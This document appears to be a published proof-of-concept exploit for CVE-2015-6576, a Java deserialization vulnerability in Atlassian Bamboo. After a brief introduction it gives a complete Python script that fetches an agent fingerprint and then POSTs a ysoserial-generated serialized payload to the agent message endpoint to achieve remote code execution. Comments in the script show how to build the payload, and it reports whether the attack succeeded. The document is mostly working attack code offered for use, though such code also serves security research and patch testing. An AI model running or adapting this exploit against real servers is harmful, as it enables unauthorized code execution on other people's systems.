A PoC for the Bamboo deserialization exploit (CVE-2015-6576). Bamboo is a continuous build server from Atlassian.

Introduction: Deserialization Vulnerabilities in Java

Deserialization vulnerabilities in Java are lesser known and less often exploited (compared to unserialize() in PHP), yet this bug class can be turned into server-side Remote Code Execution.
usage: ./bamboo.py host port /path/to/payload
#!/usr/bin/env python
# This script is styled after the scripts created by Stephen Breen of Foxglove
# Security in the somewhat infamous "What Do Weblogic, Websphere, JBoss, Jenkins,
# OpenNMS, and Your Application Have in Common? A Vulnerability."
# The Bamboo deserialization vulnerability was discovered and disclosed to
# Atlassian by Matthias Kaiser of Code White. Matthias even gave an excellent talk
# on the subject matter. You can find it on youtube (fast forward to ~42:00 to
# go straight to the demo of this vuln):
# However, Matthias didn't release the code?! So here it is, a PoC for CVE-2015-6576
# usage: ./bamboo.py host port /path/to/payload
# Note that the payload is supposed to be a payload generated by Chris Frohoff's
# ysoserial (https://github.com/frohoff/ysoserial). For example:
# java -jar ./ysoserial-0.0.2-SNAPSHOT-all.jar CommonsCollections1 'firefox' > payload.out

import re
import sys

import requests

if len(sys.argv) != 4:
    print('Usage: ./bamboo.py host port /path/to/payload')
    sys.exit(1)

host = sys.argv[1]
port = sys.argv[2]
# The ysoserial output (a serialized Java object) is sent verbatim as the POST body.
payloadObject = open(sys.argv[3], 'rb').read()

# Get the fingerprint so that we can use it in the object post
r = requests.get('http://' + host + ':' + port + '/agentServer/GetFingerprint.action?agent=elastic')
match = re.search(r'^bootstrapVersion=\d+&fingerprint=([^&]+)&', r.text)

if match:
    r = requests.post('http://' + host + ':' + port + '/agentServer/message?fingerprint=' + match.group(1), data=payloadObject)
    if r.status_code == 401:
        print("Didn't work. Probably patched.")
    elif r.status_code == 500:
        print('It worked!')
    else:
        print('I have no idea what happened.')
else:
    print('Failed to get the fingerprint.')
Source: https://github.com/CallMeJonas